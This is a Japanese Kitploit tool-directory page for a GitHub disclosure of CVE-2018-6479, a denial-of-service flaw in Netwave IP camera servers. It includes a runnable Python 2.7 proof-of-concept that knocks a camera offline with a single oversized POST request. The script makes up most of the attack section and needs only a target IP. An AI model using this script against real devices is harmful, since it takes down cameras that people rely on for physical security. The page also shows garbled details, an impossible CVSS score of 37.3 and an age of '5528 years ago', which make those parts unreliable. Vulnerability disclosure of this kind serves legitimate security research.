Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
netwave-dosvulnerability — [CVE-2018-6479] Netwave IPカメラサーバーは、1つの巨大なPOSTリクエストによってサービス拒否(DoS)攻撃に対して脆弱です。 | Kitploit
ツール/GitHubGitHub/dreadlocked/netwave-dosvulnerability
IoTセキュリティ脆弱性分析エクスプロイトウェブアプリケーション悪用ハードウェアとIoTセキュリティ
GitHubdreadlocked/netwave-dosvulnerability

netwave-dosvulnerability

[CVE-2018-6479] Netwave IPカメラサーバーは、1つの巨大なPOSTリクエストによってサービス拒否(DoS)攻撃に対して脆弱です。

リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
5528年前未レビュー

Netwave IP Camera server は、任意のファームウェアにおいて、1つの巨大なPOSTリクエストによって認証不要のサービス拒否攻撃に対して脆弱です。

CVE説明
CVE-2018-6479認証不要のリモートサービス拒否脆弱性
CVSSスコア詳細
37.3CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:X/RL:W/RC:X

0. はじめに:

IoTセキュリティ研究の過程で、さまざまなIPカメラベンダーにいくつかの脆弱性が発見されました。Netwave IP Cameraは、カメラ映像の視聴と管理を可能にするIPカメラサーバーです。IPカメラは特に物理的なセキュリティや制御目的で使用されるため、その可用性は極めて重要です。

1. サービス拒否:

任意のNetwave IP Cameraは、ルートパスに巨大なPOSTリクエストを送信するだけでダウンさせることができます。リクエストを送信すると、デバイスはフリーズし、オーディオとビデオのストリーミングが停止します。

概念実証: 以下のPython 2.7スクリプトを任意のNetWave IP Cameraに対して実行すると、即座に応答とビデオ/オーディオのストリーミングが停止します。

root@kitploit:~
import string
import httplib
import urllib2

host = "CAMERA_IP"
port = 80
params='A'*9999999 # Huge body

headers = { 
"Host": host + ':' + str(port),
"Connection": "keep-alive",
"Content-Length": 9999999,
}

url = "/"

conn = httplib.HTTPConnection(host,port=port)
conn.request("POST",url,params,headers)
response = conn.getresponse()
data = response.read()
print data

2. 研究者:

Gonzalo García León

ツールをダウンロード